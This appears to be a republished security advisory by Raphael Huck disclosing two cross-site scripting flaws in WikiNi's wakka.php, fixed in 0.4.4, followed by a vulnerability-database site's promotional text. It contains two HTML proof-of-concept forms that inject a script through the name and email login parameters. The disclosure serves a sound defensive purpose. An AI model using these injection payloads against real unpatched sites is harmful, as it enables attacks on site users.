`Hi, I've found 2 XSS vulns in WikiNi. The programmers have been contacted and the vulns addressed in version 0.4.4.
The name parameter of page wakka.php is not properly sanitized:
<html>
<body>
<form method="POST" enctype="application/x-www-form-urlencoded" action="http://www.example.com/wakka.php">
<input type="hidden" name="wiki" value="ParametresUtilisateur">
<input type="hidden" name="action" value="login">
<input type="hidden" name="name" value=">"><script>alert('XSS Vulnerable');</script>"
<input type="submit" value="Submit" name="submit">
</form>
</body>
</html>
The email parameter of page wakka.php is not properly sanitized:
<html>
<body>
<form method="POST" enctype="application/x-www-form-urlencoded" action="http://www.example.com/wakka.php">
<input type="hidden" name="wiki" value="ParametresUtilisateur">
<input type="hidden" name="action" value="login">
<input type="hidden" name="email" value=">"><script>alert('XSS Vulnerable');</script>"
<input type="submit" value="Submit" name="submit">
</form>
</body>
</html>
Original advisory: http://zone14.free.fr/advisories/6/
--Raphael HUCK
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation